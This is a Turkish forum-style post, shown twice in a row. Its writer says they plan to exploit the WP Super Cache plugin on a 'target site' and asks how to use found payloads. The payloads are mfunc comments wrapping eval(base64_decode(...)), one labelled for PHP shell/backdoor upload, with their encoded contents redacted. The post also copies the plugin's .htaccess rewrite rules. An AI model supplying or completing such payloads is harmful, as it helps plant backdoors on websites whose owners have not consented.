Arkadaşlar worpress eklenti exploit lerine bakıyodum hedef sitemde wp super cache eklentisini exploitlicem fakat internette araştırdım bir php code a rastladım; şu şekilde
1.si – to display time and date: <!--mfunc eval(base64_decode( redacted )); --><!--/mfunc-->
2.si
– php shell/backdoor upload:
<!--mfunc eval(base64_decode( also redacted, see a trend here ; ) ); --><!--/mfunc-->
bu şekilde sanırım 2.sinde shell yüklüyoruz fakat nasıl yükliceğimizi anlamadım yani mesela bunu phpde site adını belirterek shellimizi mi yazıcaz; <!--mfunc eval(base64_decode( site adı shell adı tarzında ; ) )); --><!--/mfunc-->
veya nasıl bir komut yazmalıyım
# BEGIN WordPress
SetEnv HTTP_IF_GZ_MATCH .html
SetEnvIfNoCase ^Accept-Encoding$ "(.*gzip.*)" HTTP_IF_GZ_MATCH=.html.gz
RewriteCond %{ENV:REDIRECT_STATUS} !=200
RewriteCond %{QUERY_STRING} !s
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /(.+) HTTP/ [NC]
RewriteCond %{HTTP_COOKIE} !^.*(comment_author_|wordpress|wp-postpass_).*$
RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}/%1/index%{ENV:HTTP_IF_GZ_MATCH} -f
RewriteRule ^(.*)$ /wp-content/cache/supercache/$1/index%{ENV:HTTP_IF_GZ_MATCH} [L,NC]
# END WordPress
bir de böyle bir kod var hangisini nasıl kullanırım.
1.si – to display time and date: <!--mfunc eval(base64_decode( redacted )); --><!--/mfunc-->
2.si
– php shell/backdoor upload:
<!--mfunc eval(base64_decode( also redacted, see a trend here ; ) ); --><!--/mfunc-->
bu şekilde sanırım 2.sinde shell yüklüyoruz fakat nasıl yükliceğimizi anlamadım yani mesela bunu phpde site adını belirterek shellimizi mi yazıcaz; <!--mfunc eval(base64_decode( site adı shell adı tarzında ; ) )); --><!--/mfunc-->
veya nasıl bir komut yazmalıyım
# BEGIN WordPress
SetEnv HTTP_IF_GZ_MATCH .html
SetEnvIfNoCase ^Accept-Encoding$ "(.*gzip.*)" HTTP_IF_GZ_MATCH=.html.gz
RewriteCond %{ENV:REDIRECT_STATUS} !=200
RewriteCond %{QUERY_STRING} !s
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /(.+) HTTP/ [NC]
RewriteCond %{HTTP_COOKIE} !^.*(comment_author_|wordpress|wp-postpass_).*$
RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}/%1/index%{ENV:HTTP_IF_GZ_MATCH} -f
RewriteRule ^(.*)$ /wp-content/cache/supercache/$1/index%{ENV:HTTP_IF_GZ_MATCH} [L,NC]
# END WordPress
bir de böyle bir kod var hangisini nasıl kullanırım.
